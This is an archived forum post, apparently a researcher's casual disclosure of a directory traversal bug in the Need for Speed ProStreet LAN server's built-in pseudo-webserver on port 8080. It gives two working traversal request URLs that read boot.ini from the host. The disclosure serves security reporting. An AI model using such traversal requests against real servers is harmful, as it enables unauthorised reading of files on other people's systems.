Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)
It is currently 19 Jul 2012 11:56

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 1 post ] 
Author Message
 Post subject: Need for Speed ProStreet LAN server directory traversal
PostPosted: 11 Feb 2010 11:51 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
a non-interesting and simple bug found casually while I was downloading the patch of this game for another research, I report it here only for thoroughness (mah)

in short this Need for Speed ProStreet LAN server (1.0.0 bombd.exe) has a "pseudo" webserver running by default on port 8080.
I have called it "pseudo" because in reality it's not a webserver, indeed it even doesn't send the HTTP headers!

anyway:
http://SERVER:8080/..\..\..\..\..\boot.ini
http://SERVER:8080/../../../../../boot.ini

would be better to make the request manually because the web browsers could give problems


Top
 Profile  
 
 
Display posts from previous:  Sort by  
Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 1 post ] 

All times are UTC [ DST ]


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for: